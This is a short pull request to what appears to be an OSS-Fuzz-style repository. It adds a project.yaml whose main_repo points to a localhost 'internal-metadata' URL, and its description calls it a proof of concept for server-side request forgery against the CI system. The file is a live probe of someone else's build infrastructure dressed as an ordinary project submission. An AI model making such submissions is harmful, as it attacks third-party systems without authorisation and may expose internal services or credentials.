### PR TITLE
Create project.yaml

### DIFF
--- a/projects/poc-bagasrecon/project.yaml
+++ b/projects/poc-bagasrecon/project.yaml
@@ -1,0 +1,7 @@
+main_repo: "http://127.0.0.1:8080/internal-metadata"
+language: c++
+sanitizers:
+  - address
+  - undefined
+architectures:
+  - x86_64


### PR DESCRIPTION
PoC project.yaml for SSRF test

This pull request contains a test OSS-Fuzz project that points the `main_repo` to http://127.0.0.1:8080/internal-metadata. The purpose is to observe how the CI system behaves when an invalid or internal endpoint is provided.

This is for testing and should not be merged.